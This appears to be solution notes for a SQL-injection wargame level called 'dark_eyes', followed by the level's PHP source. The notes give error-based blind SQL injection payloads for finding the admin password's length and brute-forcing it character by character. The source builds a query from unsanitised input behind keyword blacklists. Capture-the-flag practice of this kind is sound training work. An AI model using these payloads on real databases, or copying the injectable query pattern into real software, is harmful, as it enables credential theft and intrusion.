Check pw length:

'||id='admin'%26%26(length(pw)=1%26%26(select 1 union select pw))||'

query : select id from prob_dark_eyes where id='admin' and pw=''||id='admin'&&(length(pw)=X&&(select 1 union select pw))||''

Brute:

query : select id from prob_dark_eyes where id='admin' and pw=''||id='admin'&&(ord(mid(pw,1,1))=X&&(select 1 union select pw))||''

See 22_dark_eyes.pl template script.

DARK_EYES Clear!

<?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);
?>
